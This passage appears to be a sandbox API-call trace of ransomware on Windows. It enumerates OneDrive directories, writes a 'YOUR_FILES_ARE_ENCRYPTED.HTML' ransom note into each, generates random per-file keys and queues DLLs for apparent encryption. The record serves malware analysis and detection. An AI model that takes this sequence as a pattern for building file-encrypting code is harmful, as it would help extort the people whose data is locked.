ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa9164f0, 
ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa9164f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="sk", cAlternateFileName="")) returned 1 [0162.299] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sk") returned 74 [0162.299] GetProcessHeap () returned 0x270000 [0162.299] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.299] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sk" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sk") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sk" [0162.406] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sk", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sk\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sk\\*" [0162.406] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sk\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa727310, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa9164f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa9164f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x41c768, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.407] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: 
lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa727310, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa9164f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa9164f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x41c768, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.407] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa9164f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa9164f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa9164f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x136a8, dwReserved0=0x41c768, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.407] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sk\\FileSync.LocalizedResources.dll.mui") returned 110 [0162.407] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.407] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.407] lstrlenW (lpString=".mui") returned 4 [0162.407] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.407] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa9164f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa9164f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa9164f0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, 
nFileSizeLow=0x136a8, dwReserved0=0x41c768, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.407] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.407] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sk\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0162.407] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sk\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\sk\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0162.408] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.411] CloseHandle (hObject=0x5b8) returned 1 [0162.411] GetProcessHeap () returned 0x270000 [0162.412] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.412] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa9164f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaab51990, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaab51990, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="sl", cAlternateFileName="")) returned 1 [0162.412] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sl") returned 74 [0162.412] GetProcessHeap () returned 0x270000 [0162.412] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.412] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sl" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sl") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sl" [0162.413] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sl", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sl\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sl\\*" [0162.413] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sl\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa9164f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaab51990, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaab51990, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x41c768, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.413] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa9164f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaab51990, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaab51990, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x41c768, 
dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.413] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaab51990, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaab51990, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaab51990, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x132b0, dwReserved0=0x41c768, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.413] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sl\\FileSync.LocalizedResources.dll.mui") returned 110 [0162.413] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.413] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.413] lstrlenW (lpString=".mui") returned 4 [0162.413] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.413] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaab51990, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaab51990, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaab51990, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x132b0, dwReserved0=0x41c768, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.413] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.414] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sl\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0162.414] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sl\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\sl\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0162.414] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.417] CloseHandle (hObject=0x5b8) returned 1 [0162.417] GetProcessHeap () returned 0x270000 [0162.418] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.418] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaab51990, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaadb2f90, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaadb2f90, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="sq", cAlternateFileName="")) returned 1 [0162.418] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sq") returned 74 [0162.418] GetProcessHeap () returned 0x270000 [0162.418] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0162.418] lstrcpyW (in: lpString1=0x74d2010, 
lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sq" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sq") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sq" [0162.418] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sq", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sq\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sq\\*" [0162.418] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sq\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaab51990, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaadb2f90, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaadb2f90, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x41c768, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0162.419] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaab51990, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaadb2f90, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaadb2f90, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x41c768, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0162.419] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaadb2f90, ftCreationTime.dwHighDateTime=0x1d709b9, 
ftLastAccessTime.dwLowDateTime=0xaadb2f90, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaadb2f90, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x132b0, dwReserved0=0x41c768, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0162.419] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sq\\FileSync.LocalizedResources.dll.mui") returned 110 [0162.419] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.419] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.419] lstrlenW (lpString=".mui") returned 4 [0162.419] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0162.419] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaadb2f90, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaadb2f90, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaadb2f90, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x132b0, dwReserved0=0x41c768, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0162.419] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0162.419] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sq\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0162.419] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sq\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: 
"c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\sq\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0162.420] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0162.422] CloseHandle (hObject=0x5b8) returned 1 [0162.423] GetProcessHeap () returned 0x270000 [0162.423] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0162.423] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa496d0d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa496d0d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa496d0d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x2ff40, dwReserved0=0x0, dwReserved1=0x60, cFileName="sqmapi.dll", cAlternateFileName="")) returned 1 [0162.424] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sqmapi.dll") returned 82 [0162.424] lstrcmpW (lpString1="sqmapi.dll", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.424] PathFindExtensionW (pszPath="sqmapi.dll") returned=".dll" [0162.424] lstrlenW (lpString=".dll") returned 4 [0162.424] PathFindExtensionW (pszPath="sqmapi.dll") returned=".dll" [0162.424] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0162.424] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sqmapi.dll" (normalized: 
"c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\sqmapi.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b8 [0162.424] GetFileSizeEx (in: hFile=0x5b8, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=196416) returned 1 [0162.424] GetProcessHeap () returned 0x270000 [0162.424] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73e0048 [0162.425] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="C4") returned 2 [0162.425] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="53") returned 2 [0162.425] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="B1") returned 2 [0162.425] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="C8") returned 2 [0162.425] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="F7") returned 2 [0162.426] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="03") returned 2 [0162.426] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="01") returned 2 [0162.426] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="9B") returned 2 [0162.426] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="82") returned 2 [0162.426] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="01") returned 2 [0162.426] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="9A") returned 2 [0162.426] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="77") returned 2 [0162.426] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="EE") returned 2 [0162.426] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="70") returned 2 [0162.426] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="E4") returned 2 [0162.426] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="E2") returned 2 [0162.426] 
wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="3C") returned 2 [0162.426] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="57") returned 2 [0162.426] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="65") returned 2 [0162.426] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="C2") returned 2 [0162.426] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="AF") returned 2 [0162.426] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="69") returned 2 [0162.426] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="6B") returned 2 [0162.426] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="04") returned 2 [0162.426] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="F6") returned 2 [0162.428] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="E1") returned 2 [0162.428] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="29") returned 2 [0162.428] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="64") returned 2 [0162.429] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="EB") returned 2 [0162.429] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="F7") returned 2 [0162.429] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="A8") returned 2 [0162.429] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="1D") returned 2 [0162.429] lstrcpyW (in: lpString1=0x73f00fc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sqmapi.dll" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sqmapi.dll") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\sqmapi.dll" [0162.429] CreateIoCompletionPort (FileHandle=0x5b8, ExistingCompletionPort=0x3a0, CompletionKey=0x73e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0162.430] 
PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73e0048, lpOverlapped=0x73e0048) returned 1 [0162.431] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa4a51910, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4a51910, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4a51910, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x98a8, dwReserved0=0x0, dwReserved1=0x60, cFileName="SqmWrapper.dll", cAlternateFileName="SQMWRA~1.DLL")) returned 1 [0162.431] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\SqmWrapper.dll") returned 86 [0162.431] lstrcmpW (lpString1="SqmWrapper.dll", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0162.431] PathFindExtensionW (pszPath="SqmWrapper.dll") returned=".dll" [0162.431] lstrlenW (lpString=".dll") returned 4 [0162.431] PathFindExtensionW (pszPath="SqmWrapper.dll") returned=".dll" [0162.431] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0162.431] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\SqmWrapper.dll" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\sqmwrapper.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x594 [0162.432] GetFileSizeEx (in: hFile=0x594, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=39080) returned 1 [0162.432] GetProcessHeap () returned 0x270000 [0162.432] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7422068 [0162.437] wsprintfW (in: 
param_1=0x4ebd112, param_2="%02X" | out: param_1="C1") returned 2 [0162.438] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="47") returned 2 [0162.438] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="FF") returned 2 [0162.438] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="3E") returned 2 [0162.438] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="37") returned 2 [0162.438] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="4A") returned 2 [0162.438] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="A3") returned 2 [0162.438] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="2F") returned 2 [0162.438] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="5B") returned 2 [0162.438] wsprintfW (in: 